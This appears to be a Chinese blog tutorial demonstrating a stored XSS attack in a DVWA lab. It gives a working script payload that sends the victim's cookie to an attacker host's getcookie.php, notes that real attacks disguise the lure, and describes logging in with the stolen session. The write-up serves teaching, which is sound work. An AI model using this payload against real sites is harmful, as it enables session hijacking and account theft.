实例演示——————简单演示XSS store攻击,便于学习理解XSS store

本文通过DVWA平台演示了如何利用XSS漏洞盗取用户的Cookie信息,并进一步获取其登录凭证的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

此次演示环境是DVWA,将盗取cookie代码存储于服务端,受害者点击链接激活盗取cookie代码从而盗取受害者cookie,实施入侵。
一,环境搭建
     1,将DVWA环境搭建在192.168.98.168主机上,并确定该环境能正常使用。
     2,准备盗取cookie代码。(该步骤在实际攻击中要善于伪装、诱使受害者点击。可写于留言板也可存储在第三方服务器将第三方url诱使受害者点开激活代码)
     3,接收cookie代码准备。(此次代码放在攻击者主机192.168.98.170上)




二,实例演示XSS store

     1,如图,受害者(192.168.98.168)正在登陆DVWA


     2,攻击者再存在XSS漏洞页面留言:<script>document.write('<img src="http://192.168.98.170/getcookie.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');alert(/XSS/)</script>    //为了演示,alert(/XSS/)</script>是加上去看效果的


     3,受害者浏览存在XSS漏洞页面,触发代码执行,本地cookie被盗取


     4,查看接收cookie代码getcookie.php是否生成cookie.txt文本文件,是则接收到cookie并存储于其中。


     5,攻击者利用工具,修改cookie登陆DVWA,获得受害者一样的管理员权限。







三,总结
    此次简单的演示,便于初步认识XSS store。可以发挥想象你就清楚XSS store的危害以及为何XSS会位列OWASP TOP 10.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值